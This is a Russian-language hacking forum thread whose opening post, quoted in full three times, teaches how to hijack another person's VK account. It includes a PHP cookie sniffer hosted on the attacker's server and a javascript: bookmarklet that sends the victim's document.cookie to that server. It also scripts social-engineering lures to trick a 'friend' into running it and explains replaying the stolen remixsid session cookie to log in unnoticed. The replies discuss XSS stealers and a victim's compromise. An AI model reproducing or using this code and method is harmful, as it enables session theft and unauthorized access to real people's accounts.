Взламываем Вк неподозревающего врага

[pers1981]

Расскажу, как я ломала страницы в 16-17 годах, сейчас я не занимаюсь такими мелочами, но способ по идее должен до сих пор работать.

Нам нужен будет ftp сервер. На нем надо создать папку, называем ее next.

Выбираем эту папку и жмем кнопку chmod, появятся галочки, ставим на все и жмем сохранить. Внутри папки создаём файл index.php

Далее открываем и пишем снифер:


Код:
<?php

//получаем данные с ссылки

$cookie = $_SERVER['REQUEST_URI'];

//ip адрес

$ip = $_SERVER['REMOTE_ADDR'];

//Создаём файл

$file = fopen("snif.dat","a+");

//вычисляем текущее время

$time = date("H:i:M:d");

//добавляем в строковую переменную куки + время + ip

$add_text = "$ip $time $cookie";

//записываем данные в файл

fputs($file,$add_text.",\r\n");

//закрываем файл

fclose($file);

//что бы не спалили переносим пользователя обратно в вк

header('Location:https://vk.com');

?>
Снифер готов. У нас должно получиться такая ссылка:

http://ваш_домен.ру/next/index.php

Далее открываем любой текстовый редактор (например блокнот) и пишем:


Код:
javascript:window.location.href = "http://ваш_домен.ру/next/index.php?cookie="+document.cookie;



И скидывает это нашему дружку. Пишем ему например:

«Если поставишь это в адресную строку на твоей странице пойдет снег или на всех твоих фотках на странице будет по 10 000 лайков!».

Тут подход ко всем разный, надо немного использовать СИ.

Если он запустит этот скрипт в адресной строке, то её сразу переведёт в стартовую страницу Вконтакте. Никакой снег, конечно же, не пойдет там у него, но зато у нас на сервере будет дат файл с его куками.

Далее нам нужна подмена уведенных куков.

Самый простой способ:

Открываем браузер Опера > Настройки > Общие настройки > Расширенные > Cookies Opera Cookies.

Достаточно изменить только значение параметра куков remixsid.

Обновляем страницу и сразу же входим в другой аккаунт, без всякого логина и пароля. При этом наш друг не узнает, то что мы вошли на его страницу. Методы анонимности выбирайте сами. Такие дела.

Статья носит исключительно информационный характер и не призывает ни к каким действиям. Автор не несет никакой ответственности за размещенные материалы.

 

[User_54779]

Как раз изучаю сейчас всякого рода XSS уязвимости. Там конечно все стало более технично. В ссылку вшивается стиллер. Но методика схожая. По сути даже билд не нужен. Все что нужно так это щелчок по ссылке.

 

[spojo]

Что-то так орнул от Куков

 

[Удалённый пользователь 5596]

Как раз изучаю сейчас всякого рода XSS уязвимости. Там конечно все стало более технично. В ссылку вшивается стиллер. Но методика схожая. По сути даже билд не нужен. Все что нужно так это щелчок по ссылке.

Помню мне так с авито кидали типа перейди по ссылке там мои фото на трейд ин машины, а на самом деле хуй был там так как я на iOS сижу и ничего не качалось :)

 

[User_54779]

Помню мне так с авито кидали типа перейди по ссылке там мои фото на трейд ин машины, а на самом деле хуй был там так как я на iOS сижу и ничего не качалось :)

Кстати под ios тоже есть свои ссылки сюрпризы. Я свой собственный айфон взломал)

 

[ice-o-lator]

читал этот копипаст порядка полугода назад. конкретно даже знаю откуда слит

 

[Ksendr]

Кстати под ios тоже есть свои ссылки сюрпризы. Я свой собственный айфон взломал)

Вот тут если можно поподробней.

 

[lexx77]

Расскажу, как я ломала страницы в 16-17 годах, сейчас я не занимаюсь такими мелочами, но способ по идее должен до сих пор работать.

Нам нужен будет ftp сервер. На нем надо создать папку, называем ее next.

Выбираем эту папку и жмем кнопку chmod, появятся галочки, ставим на все и жмем сохранить. Внутри папки создаём файл index.php

Далее открываем и пишем снифер:


Код:
<?php

//получаем данные с ссылки

$cookie = $_SERVER['REQUEST_URI'];

//ip адрес

$ip = $_SERVER['REMOTE_ADDR'];

//Создаём файл

$file = fopen("snif.dat","a+");

//вычисляем текущее время

$time = date("H:i:M:d");

//добавляем в строковую переменную куки + время + ip

$add_text = "$ip $time $cookie";

//записываем данные в файл

fputs($file,$add_text.",\r\n");

//закрываем файл

fclose($file);

//что бы не спалили переносим пользователя обратно в вк

header('Location:https://vk.com');

?>
Снифер готов. У нас должно получиться такая ссылка:

http://ваш_домен.ру/next/index.php

Далее открываем любой текстовый редактор (например блокнот) и пишем:


Код:
javascript:window.location.href = "http://ваш_домен.ру/next/index.php?cookie="+document.cookie;



И скидывает это нашему дружку. Пишем ему например:

«Если поставишь это в адресную строку на твоей странице пойдет снег или на всех твоих фотках на странице будет по 10 000 лайков!».

Тут подход ко всем разный, надо немного использовать СИ.

Если он запустит этот скрипт в адресной строке, то её сразу переведёт в стартовую страницу Вконтакте. Никакой снег, конечно же, не пойдет там у него, но зато у нас на сервере будет дат файл с его куками.

Далее нам нужна подмена уведенных куков.

Самый простой способ:

Открываем браузер Опера > Настройки > Общие настройки > Расширенные > Cookies Opera Cookies.

Достаточно изменить только значение параметра куков remixsid.

Обновляем страницу и сразу же входим в другой аккаунт, без всякого логина и пароля. При этом наш друг не узнает, то что мы вошли на его страницу. Методы анонимности выбирайте сами. Такие дела.

Статья носит исключительно информационный характер и не призывает ни к каким действиям. Автор не несет никакой ответственности за размещенные материалы.

Меня подобно ломанули , только я никуда не переходил по ссылке , ломанули все ,Гугл ,ватцап , Вибер , майл , не пойму как ? Андроид . Менял пароли не помогло . И это продолжается с лета , ничего не могу , хочу удалиться везде и сменить симку .

 

[Лже Дмитрий]

Кстати под ios тоже есть свои ссылки сюрпризы. Я свой собственный айфон взломал)

Было бы интересно почитать :)

 

[FItseaz]

https://telegra.ph/Vzlom-VK-Eshche-odin-sposob-12-03

Вот тут если можно поподробней.

 

[Ksendr]

https://telegra.ph/Vzlom-VK-Eshche-odin-sposob-12-03

А зачем ты скинул тоже самое что и ТС написал ?

 

[FItseaz]

А зачем ты скинул тоже самое что и ТС написал ?

так надо

 

[Maksimmaddy]

Не совсем понятно про ftp сервер. Просто создать из под винды ftp? И где там будет кнопка chmod?
Разъясните, пожалуйста.

 

[User_54779]

Меня подобно ломанули , только я никуда не переходил по ссылке , ломанули все ,Гугл ,ватцап , Вибер , майл , не пойму как ? Андроид . Менял пароли не помогло . И это продолжается с лета , ничего не могу , хочу удалиться везде и сменить симку .

Сделали дубликат твоей сим

 

[Жуткий]

Меня подобно ломанули , только я никуда не переходил по ссылке , ломанули все ,Гугл ,ватцап , Вибер , майл , не пойму как ? Андроид . Менял пароли не помогло . И это продолжается с лета , ничего не могу , хочу удалиться везде и сменить симку .

Пасут тебя паря! Полож смарт и сверху камнем долбани ,порой радикальные меры нас предохроняют. А лучше скинь его в общественном транспорте ,пусть малек какой нибудь им пользуется. Еще варик отдать на тест анализ, наити слив и заткнуть.
. [/QUOTE]
[automerge]1550098489[/automerge]

Расскажу, как я ломала страницы в 16-17 годах, сейчас я не занимаюсь такими мелочами, но способ по идее должен до сих пор работать.

Нам нужен будет ftp сервер. На нем надо создать папку, называем ее next.

Выбираем эту папку и жмем кнопку chmod, появятся галочки, ставим на все и жмем сохранить. Внутри папки создаём файл index.php

Далее открываем и пишем снифер:


Код:
<?php

//получаем данные с ссылки

$cookie = $_SERVER['REQUEST_URI'];

//ip адрес

$ip = $_SERVER['REMOTE_ADDR'];

//Создаём файл

$file = fopen("snif.dat","a+");

//вычисляем текущее время

$time = date("H:i:M:d");

//добавляем в строковую переменную куки + время + ip

$add_text = "$ip $time $cookie";

//записываем данные в файл

fputs($file,$add_text.",\r\n");

//закрываем файл

fclose($file);

//что бы не спалили переносим пользователя обратно в вк

header('Location:https://vk.com');

?>
Снифер готов. У нас должно получиться такая ссылка:

http://ваш_домен.ру/next/index.php

Далее открываем любой текстовый редактор (например блокнот) и пишем:


Код:
javascript:window.location.href = "http://ваш_домен.ру/next/index.php?cookie="+document.cookie;



И скидывает это нашему дружку. Пишем ему например:

«Если поставишь это в адресную строку на твоей странице пойдет снег или на всех твоих фотках на странице будет по 10 000 лайков!».

Тут подход ко всем разный, надо немного использовать СИ.

Если он запустит этот скрипт в адресной строке, то её сразу переведёт в стартовую страницу Вконтакте. Никакой снег, конечно же, не пойдет там у него, но зато у нас на сервере будет дат файл с его куками.

Далее нам нужна подмена уведенных куков.

Самый простой способ:

Открываем браузер Опера > Настройки > Общие настройки > Расширенные > Cookies Opera Cookies.

Достаточно изменить только значение параметра куков remixsid.

Обновляем страницу и сразу же входим в другой аккаунт, без всякого логина и пароля. При этом наш друг не узнает, то что мы вошли на его страницу. Методы анонимности выбирайте сами. Такие дела.

Статья носит исключительно информационный характер и не призывает ни к каким действиям. Автор не несет никакой ответственности за размещенные материалы.

"]
А правдо кто знает где вырвать кусок дизамнер примочек для соц.сетей ,снег на аватарке, банер и тд.. [/QUOTE]

 

[Bekskrecher]

До сих пор актуально ?

 

[Morris]

Меня подобно ломанули , только я никуда не переходил по ссылке , ломанули все ,Гугл ,ватцап , Вибер , майл , не пойму как ? Андроид . Менял пароли не помогло . И это продолжается с лета , ничего не могу , хочу удалиться везде и сменить симку .

Скорее всего ботнетик у тебя сидит, сноси пробуй дозаводских либо прошивку ставь другую и смотри уже потом

 

[Ez4M9]

До сих пор актуально ?

Пока есть куки, то да

 

[haubsik]

Пока есть куки, то да

Они же к ip привязываются, как с их помощью логиниться?

 

[Ez4M9]

Они же к ip привязываются, как с их помощью логиниться?

Главное что работает